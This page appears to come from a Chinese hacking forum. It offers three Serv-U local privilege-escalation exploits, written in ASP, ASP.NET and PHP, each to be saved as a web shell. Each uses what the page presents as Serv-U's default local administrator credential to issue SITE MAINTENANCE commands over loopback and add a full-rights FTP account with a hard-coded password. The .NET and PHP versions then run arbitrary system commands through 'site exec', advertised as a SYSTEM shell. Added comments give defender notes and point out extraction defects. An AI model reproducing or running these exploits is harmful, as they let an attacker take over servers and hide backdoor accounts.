下面代码保存为servu.asp即可,利用了xml组件,建立一个lake 密码为admin123的可执行ftp帐号
Serv-U 2 admin by lake2
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000FF;text-decoration: none;}
a:visited {text-decoration: none;color: #0000FF;}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
Serv-U Local Get SYSTEM Shell with ASP
Author: lake2, http://lake2.0x54.org
user:
pwd :
port:
Add User
Del User
' --- Serv-U "add / delete user via SITE MAINTENANCE" form handler (VBScript / ASP) ---
' Reads an FTP user name, password and port from the posted form and sends a
' raw FTP command script to 127.0.0.1:<port> as the body of an MSXML2.XMLHTTP
' POST. The script logs in with the supplied credentials, issues
' SITE MAINTENANCE, then either -SETUSERSETUP (radiobutton = "add") or
' -DELETEUSER. The account it creates is hard-coded: user "lake", password
' "admin123", -HomeDir=c:\, Access=c:\|RWAMELCDP, -Maintenance=System, i.e. an
' FTP account with full rights on the local Serv-U instance. Unlike the .NET
' variant further down this page, the user is added to the existing domain on
' port 21 (the -SETDOMAIN line is commented out).
'
' NOTE(review): the ASP opening tag and the HTML form that supplies "duser",
' "dpwd", "dport" and "radiobutton" are not present on this page (only the
' closing %> survives), so the block is not runnable as shown.
'
' Defender notes (limited to what this script does):
'  - The technique needs a local process that can open a TCP connection to
'    Serv-U on loopback and a credential Serv-U accepts for SITE MAINTENANCE.
'    Limiting what the IIS worker account can reach on loopback and running
'    Serv-U under the least privilege it needs are the structural controls;
'    affected Serv-U versions are not named on this page.
'  - Artifacts: a Serv-U user "lake" with home c:\ and RWAMELCDP rights, and
'    SITE MAINTENANCE / -SETUSERSETUP traffic from 127.0.0.1 on the FTP port
'    (only visible if Serv-U's logging records SITE commands; not verifiable
'    from this page).
' Form inputs are concatenated into the command lines without validation.
Usr = request.Form("duser")
pwd = request.Form("dpwd")
port = request.Form("dport")
'Command = request.Form("dcmd")
if request.Form("radiobutton") = "add" Then
' Login lines, then SITE MAINTENANCE to enter the maintenance command set.
lake2 = "User " & Usr & vbcrlf
lake2 = lake2 & "Pass " & pwd & vbcrlf
lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf
'lake2 = lake2 & "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
' -SETUSERSETUP record. VBScript does not treat backslash as an escape, so
' "c:\\" is sent with two literal backslashes. The record ends with the
' " Access=" line (leading space, no dash), which the other variants on this
' page use the same way as the terminating line of a record.
lake2 = lake2 & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
'lake2 = lake2 & "quit" & vbcrlf
'--------
'On Error Resume Next
' The FTP script is delivered as an HTTP POST body to the FTP port. The
' script never reads the reply, so success is not checked; Open is called
' asynchronously (last argument True) and the object is released right after
' Send, so whether the whole body is delivered before release is not
' guaranteed by anything shown here. The "[url]…[/url]" tokens inside the URL
' string look like forum markup left by extraction and would break the URL
' as written.
Set xPost = CreateObject("MSXML2.XMLHTTP")
xPost.Open "POST", "[url]http://127.0.0.1:[/url]"& port &"/lake2", True
xPost.Send(lake2)
Set xPOST=nothing
' The string literal below continues on the next line — most likely an HTML
' line-break tag was stripped during extraction. VBScript string literals
' cannot span lines, so as shown this is a syntax error.
response.write "FTP user lake pass admin123 :)
"
else
' Delete branch: same login, then a -DELETEUSER record for user "lake" in the
' port-21 domain. The reply is not read here either.
lake2 = "User " & Usr & vbcrlf
lake2 = lake2 & "Pass " & pwd & vbcrlf
lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf
lake2 = lake2 & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & " User=lake" & vbcrlf
Set xPost3 = CreateObject("MSXML2.XMLHTTP")
xPost3.Open "POST", "[url]http://127.0.0.1:[/url]"& port &"/lake2", True
xPost3.Send(lake2)
Set xPOST3=nothing
' Same split-literal extraction artifact as in the add branch.
response.write "Done!
"
end if
%>
Only for Enjoy&Challenge
!
下面保存为servu.aspx,利用servu的本地溢出执行命令
'
' Love, Where are you ?
' BTN_Start_Click: ASP.NET (VB) button handler that drives a local Serv-U
' instance through two FTP sessions, both to 127.0.0.1:
'   1. Text_Port: logs in with Text_Name / Text_PWD, sends SITE MAINTENANCE,
'      deletes any domain on port 43859 (DelDomain), creates domain "cctv" on
'      43859 (NewDomain) and a user "lake" / "admin123" in it with
'      -HomeDir=c:\, Access=c:\|RWAMELCDP and -Maintenance=System (NewUser).
'   2. 43859: logs in as lake / admin123 and sends "site exec <Text_cmd>".
'   Afterwards the 43859 domain is deleted on session 1, QUIT is sent and
'   both sockets are closed.
' The form defaults that follow this code on the page pre-fill Text_Name,
' Text_PWD and Text_Port with what the page presents as Serv-U's local
' administrator login and port 43958; that is the credential step 1 relies on.
'
' Defender notes:
'  - All traffic is loopback, so the exposure is a web worker process on the
'    Serv-U host being able to reach the administrative listener with a
'    credential that is identical wherever those defaults apply. Controls are
'    host-side: run Serv-U under a low-privilege service account (the page
'    title advertises a SYSTEM shell, i.e. it assumes Serv-U runs as SYSTEM),
'    restrict loopback access to the admin port, and keep Serv-U patched
'    (affected versions are not named on this page).
'  - Artifacts: a domain "cctv" on 43859 and a user "lake" that survive
'    whenever the second connection fails — the DelDomain cleanup is only
'    reached on the success path, because Response.End in the Catch blocks
'    aborts the handler.
'  - "site exec" on a non-standard port from 127.0.0.1 is the execution step
'    and worth alerting on if Serv-U logs it.
'
' No FTP reply is ever parsed: Rec only echoes one chunk, so a failed login
' or a rejected maintenance record is not detected here.
Sub BTN_Start_Click(sender As Object, e As EventArgs)
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
' Implicit String -> Int32 narrowing: rejected under Option Strict On and
' throws at runtime for non-numeric input.
Dim Port As Int32 = Text_Port.Text
Dim Command As String = Text_cmd.Text
Dim LoginUser As String = "User " & Usr & vbcrlf
Dim LoginPass As String = "Pass " & pwd & vbcrlf
' Maintenance records. VB does not treat backslash as an escape, so "c:\\"
' goes out with two literal backslashes. Each record ends with a line that
' starts with a space instead of a dash.
Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
Dim DelDomain As String = "-DELETEDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
Dim Quit As String = "QUIT" & vbcrlf
Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf
'Dim client As New TcpClient
' Session 1: the administrative connection on the user-supplied port.
Dim tcpClient As New TcpClient()
Try
' "port" resolves to the Int32 "Port" above (VB identifiers are case-insensitive).
tcpClient.Connect("127.0.0.1", port)
Catch eee As Exception
' Response.End stops the page by raising a ThreadAbortException; nothing
' after this Try block runs when the connect fails.
response.write(eee.ToString())
response.end
End Try
' Rec reads at most one 1024-byte chunk per call; a multi-line banner or a
' fragmented reply leaves unread data and desynchronises the exchange.
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
' Remove any stale domain on 43859 before (re)creating it.
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, NewDomain)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
' Session 2: connect to the domain just created and run the command as the
' new user. If this connect fails the handler ends here and the domain and
' user created above are never removed.
Dim tcpClient2 As New TcpClient()
Try
tcpClient2.Connect("127.0.0.1", 43859)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient2.ReceiveBufferSize = 1024
Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
Rec(networkStream2)
Send(networkStream2, "User lake" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "pass admin123" & vbcrlf)
Rec(networkStream2)
' Command is inserted unescaped; a CRLF inside it would end the line early.
Send(networkStream2, "site exec " & Command & vbcrlf)
Rec(networkStream2)
tcpClient2.Close()
' Cleanup on session 1: drop the temporary domain, then QUIT.
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub
' Rec: read one chunk (up to 1024 bytes) from the stream and echo it to the
' page as "out:<text>"; writes "What's wrong ?" if the stream is not readable.
'   o: declared Object and used late-bound (requires Option Strict Off); the
'      callers on this page pass a NetworkStream.
' Defects worth noting:
'   - Dim bytes(1024) declares 1025 elements (VB array bounds are inclusive);
'     the read is limited to 1024 bytes, so the last element is always 0.
'   - The Read return value (bytes actually received) is discarded, so
'     GetString decodes the whole buffer, trailing NULs included.
'   - One Read is not one FTP reply; multi-line or fragmented replies are not
'     handled, and no reply code is ever checked by the caller.
'   - The response.Write literal is split across two lines: an HTML
'     line-break tag was most likely removed during extraction.
Sub Rec(o As Object)
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write("out:" & returndata & "
")
Else
response.Write("What's wrong ?")
End If
End Sub
' Send: write data to the stream as ASCII and echo it to the page as
' "in: <data>"; writes "What's wrong ?" if the stream is not writable.
'   o:    declared Object and used late-bound (Option Strict Off); callers on
'         this page pass a NetworkStream.
'   data: the FTP command line(s) to send, including the trailing CRLF.
' Notes:
'   - Encoding.ASCII replaces any non-ASCII character with "?", so a command
'     containing such characters is not sent verbatim.
'   - [Byte] is just the escaped keyword form of Byte.
'   - The echoed data is written to the page unencoded.
'   - The response.write literal is split across two lines, most likely an
'     HTML line-break tag stripped during extraction.
Sub Send(o As Object,data As String)
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write("in: " & data & "
")
Else
response.Write("What's wrong ?")
End If
End Sub
from Serv-U 2
admin by lake2
Name
LocalAdministrator
PWD
#l@$ak#.lk;0@P
Port
43958
cmd
下面保存为servu.php,是php版的servu本地溢出程序,可以执行命令。
// Serv-U local exploit, PHP variant. Expects POST fields Port, User, Pass and
// Command (the form labels at the bottom of the page belong to it; the
// opening PHP tag is not present on this page, only the closing "?>").
// Flow, everything on 127.0.0.1:
//   $sock -> $_POST["Port"]: USER/PASS with the posted credentials,
//            SITE MAINTENANCE, -SETDOMAIN "haxorcitos" on port 2121,
//            -SETUSERSETUP user Will_Be / Will_Be with -HomeDir=c:\ and
//            Access=c:\|RELP.
//   $exp  -> 2121: USER Will_Be / PASS Will_Be, then "site exec <Command>".
//   $sock -> -DELETEDOMAIN for port 2121; both sockets are closed.
// Differences from the VB.NET variant above: the temporary user has
// -Maintenance=None and only RELP rights, no stale domain is deleted before
// creation, and no QUIT is sent.
//
// Defender notes: the only network activity is loopback, so the control that
// matters is which local processes can reach Serv-U's listener on that port
// with a credential Serv-U honours for SITE MAINTENANCE. A short-lived
// domain "haxorcitos" on 2121, a user "Will_Be", and a "site exec" command
// arriving from 127.0.0.1 are the observable artifacts; because neither
// fsockopen() result is checked, a failure of the second connection leaves
// the domain and user behind (if the script keeps going on warnings).
//
// Code notes:
//   - fsockopen(..., &$errno, &$errstr, ...) uses call-time pass-by-reference,
//     a fatal error from PHP 5.4 on; the parameters are by-reference already,
//     so the "&" must be dropped.
//   - fsockopen() results are not checked; fgets()/fputs() on a non-resource
//     fail with a warning (a TypeError on PHP 8) and the echoed "Recv:" lines
//     are empty rather than the script stopping.
//   - echo strings span two lines where an HTML line-break tag was probably
//     stripped during extraction; a double-quoted PHP string may contain a
//     newline, so these still parse.
//   - Each fgets() reads one line; multi-line FTP replies leave data unread
//     and desynchronise the exchange, and no reply code is ever checked.
//   - $_POST values are concatenated unvalidated into the FTP command lines
//     and echoed back to the page unencoded.
if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))
{
$sendbuf = "";
$recvbuf = "";
// Maintenance records. In double quotes "c:\\" is a single backslash, unlike
// the VBScript/VB.NET variants on this page which send two.
$domain = "-SETDOMAIN\r\n".
"-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
"-TZOEnable=0\r\n".
" TZOKey=\r\n";
$adduser = "-SETUSERSETUP\r\n".
"-IP=0.0.0.0\r\n".
"-PortNo=2121\r\n".
"-User=Will_Be\r\n".
"-Password=Will_Be\r\n".
"-HomeDir=c:\\\r\n".
"-LoginMesFile=\r\n".
"-Disable=0\r\n".
"-RelPaths=1\r\n".
"-NeedSecure=0\r\n".
"-HideHidden=0\r\n".
"-AlwaysAllowLogin=0\r\n".
"-ChangePassword=0\r\n".
"-QuotaEnable=0\r\n".
"-MaxUsersLoginPerIP=-1\r\n".
"-SpeedLimitUp=0\r\n".
"-SpeedLimitDown=0\r\n".
"-MaxNrUsers=-1\r\n".
"-IdleTimeOut=600\r\n".
"-SessionTimeOut=-1\r\n".
"-Expire=0\r\n".
"-RatioUp=1\r\n".
"-RatioDown=1\r\n".
"-RatiosCredit=0\r\n".
"-QuotaCurrent=0\r\n".
"-QuotaMaximum=0\r\n".
"-Maintenance=None\r\n".
"-PasswordType=Regular\r\n".
"-Ratios=None\r\n".
" Access=c:\\|RELP\r\n";
$deldomain="-DELETEDOMAIN\r\n".
"-IP=0.0.0.0\r\n".
" PortNo=2121\r\n";
// Session 1: administrative connection on the posted port (10 s timeout).
// Return value unchecked; call-time "&" is invalid on PHP >= 5.4.
$sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
$sendbuf = "USER ".$_POST["User"]."\r\n";
fputs($sock, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
$sendbuf = "PASS ".$_POST["Pass"]."\r\n";
fputs($sock, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
$sendbuf = "SITE MAINTENANCE\r\n";
fputs($sock, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
// Create the temporary domain, then the temporary user inside it.
$sendbuf = $domain;
fputs($sock, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
$sendbuf = $adduser;
fputs($sock, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
echo "**********************************************************
";
echo "Starting Exploit ...
";
echo "**********************************************************
";
// Session 2: connect to the new domain as the temporary user and run the
// posted command. Result of fsockopen() again unchecked; if this connect
// fails nothing below stops, and the cleanup still targets only $sock.
$exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);
$recvbuf = fgets($exp, 1024);
echo "Recv: $recvbuf
";
$sendbuf = "USER Will_Be\r\n";
fputs($exp, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($exp, 1024);
echo "Recv: $recvbuf
";
$sendbuf = "PASS Will_Be\r\n";
fputs($exp, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($exp, 1024);
echo "Recv: $recvbuf
";
// "Command" is not covered by the isset() guard above and is inserted
// unvalidated; a CRLF inside it would end the command line early.
$sendbuf = "site exec ".$_POST["Command"]."\r\n";
fputs($exp, $sendbuf, strlen($sendbuf));
echo "Send: site exec ".$_POST["Command"]."
";
$recvbuf = fgets($exp, 1024);
echo "Recv: $recvbuf
";
echo "**********************************************************
";
echo "Starting Delete Domain ...
";
echo "**********************************************************
";
// Cleanup: drop the temporary domain on session 1 (no QUIT is sent).
$sendbuf = $deldomain;
fputs($sock, $sendbuf, strlen($sendbuf));
echo "Send: $sendbuf
";
$recvbuf = fgets($sock, 1024);
echo "Recv: $recvbuf
";
fclose($sock);
fclose($exp);
}
?>
Serv-U Local Exploit By Will_Be
LocalPort:
LocalUser:
LocalPass:
Command :